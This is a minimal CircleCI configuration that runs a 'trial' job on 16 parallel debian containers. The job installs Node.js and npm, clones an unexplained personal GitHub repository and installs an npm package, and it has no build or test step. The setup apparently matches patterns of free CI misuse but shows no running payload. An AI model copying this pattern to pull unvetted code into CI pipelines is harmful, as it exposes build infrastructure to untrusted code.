version: 2.1
jobs:
    trial:
      docker:
            - image: debian:latest
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: apt update; apt install nodejs -y; apt install git; git clone https://github.com/Knallgod11/321; apt install npm; npm i randomstring

workflows:
    version: 2.1
    build:
        jobs:
        - trial
